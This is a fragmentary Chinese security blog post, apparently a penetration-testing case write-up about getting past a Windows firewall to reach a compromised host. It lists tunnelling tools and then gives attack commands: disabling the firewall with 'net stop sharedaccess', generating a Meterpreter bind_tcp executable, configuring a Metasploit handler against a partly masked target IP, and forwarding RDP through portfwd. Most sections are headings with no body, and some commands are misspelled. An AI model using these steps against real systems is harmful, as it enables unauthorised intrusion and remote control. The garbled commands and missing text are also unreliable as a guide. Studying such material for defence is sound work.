0x01 前言
反向连接:
1. Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https
正向连接:
3.2 Bind_tcp
HTTP隧道:
4. reDuh_Gui、5. Http_Tunna、reGeorg、neo_reGeorg
0x02 简单分析
0x03 绕过方式
net stop sharedaccess
msfpayload windows/meterpreter/bind_tcp LPORT=53 X > /tmp/53.exe
use exploit/mutil/handler
set PAYLOADY windows/meterpreter/bind_tcp
set RHOST 218.**.***.37
set LPORT 53
exploit
0x04 小小技巧
meterpreter > portfwd add -l 1234 -r 127.0.0.1 -p 3389
潇湘信安
一个不会编程、挖SRC、代码审计、渗透测试的业余网络安全人员,该公众号主要用于分享个人学习笔记、安全经验以及各类疑难杂症!
公众号
推 荐 阅 读
本文推荐实操:Linux防火墙(复制链接体验吧)
https://www.hetianlab.com/expc.do?ec=8b3a16a6-3eb7-4035-a94b-26baa0d05d51&pk_campaign=weixin-wemedia#stu
通过该实验了解Linux防火墙iptables实现原理,掌握iptables基本使用方法,能够利用iptables对操作系统进行加固。
本文始发于微信公众号(合天网安实验室):记一次绕系统防火墙反弹案例
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论